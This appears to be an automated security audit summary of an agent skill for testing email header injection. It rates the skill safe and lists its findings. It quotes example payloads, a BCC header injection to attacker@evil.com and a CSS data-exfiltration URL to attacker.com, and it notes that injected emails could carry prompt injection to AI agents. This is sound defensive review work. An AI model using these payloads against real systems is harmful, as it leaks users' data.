email-header-injection

Pass

Audited by Gen Agent Trust Hub on Sep 15, 2026

Risk Level: SAFECOMMAND_EXECUTIONDATA_EXFILTRATIONINDIRECT_PROMPT_INJECTION
Full Analysis
  • [COMMAND_EXECUTION]: The skill instructs the agent to execute DNS reconnaissance commands such as dig TXT target.com to verify SPF, DKIM, and DMARC configurations during security assessments.
  • [DATA_EXFILTRATION]: The skill documents common attack patterns for data exfiltration, including BCC injection payloads (Bcc:attacker@evil.com) and CSS-based data exfiltration techniques (background: url('https://attacker.com/leak?char=a')). These are presented as educational examples for penetration testing.
  • [INDIRECT_PROMPT_INJECTION]: The skill defines a testing surface involving user-controlled input fields (e.g., contact forms, email APIs) that are processed into SMTP headers. While focused on CRLF injection, these sinks represent potential vectors for indirect prompt injection if the resulting emails are subsequently processed by automated agents or LLM-powered mail clients.
Audit Metadata
Risk Level
SAFE
Analyzed
Sep 15, 2026, 02:13 PM
Security Audit — agent-trust-hub — email-header-injection